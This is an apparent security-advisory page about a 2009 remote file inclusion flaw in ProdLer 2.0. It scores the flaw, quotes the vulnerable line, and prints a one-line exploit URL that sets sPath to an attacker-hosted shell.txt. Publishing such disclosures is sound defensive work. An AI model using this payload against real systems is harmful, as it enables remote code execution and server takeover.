ProdLer <= 2.0 (prodler.class.php sPath) RFI Vulnerability

2009-09-24 / 2009-09-25
Credit: cr4wl3r
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#######################[In The Name Of Allah]########################## #ProdLer <= 2.0 Remote File Include Vulnerability #Download Script : http://sourceforge.net/projects/prodler/files/ #Author : cr4wl3r #Contact : cr4wl3r[4t]linuxmail[dot]org #Location : Gorontalo - INDONESIA #Blog : http://sh3ll4u.blogspot.com #Dork : No DoRk f0R ScRipT KiDDieS ######################################################################## #file : # prodler.class.php # line 4 require_once $sPath.'include/variable.class.php'; ######################################################################## #3xplo!t : #http://target.com/[path]/include/prodler.class.php?sPath=http://attacker.com/shell.txt??? ######################################################################## #Greetz : MyMom [alm] #Special Thanks : str0ke, All MusLim HacKers #Thanks 2 : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral, s4va, # mywisdom, wendys, cyberpeace, agenr@t, basix, nTc, angky.tatoki, funky_sensey, exnome, # aRiee, Romy.Chairul, Mr.C, Mr.Crossbeam, noQen, CyberSufi, untouch, g4pt3k, chawanua, # d3vilnet, donyskaynet, panteto, MaRloN, Dew0 ######################################################################## # F0r All MusLim In tHe W0rlD : # SelaMat IduL FitRi 1 SyaWaL 1430H # Takabbalallah Huminnawaminkum Minalaidin Walfaizin ######################################################################## #Note : No fuCk, JusT PeaCe ######################################################################## #sekuritionline.net (all crew sekuritionline) #manadocoding.net (all crew manadocoding) ###########################[VIVA ISLAM]#################################

References:

http://www.milw0rm.com/exploits/9728


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top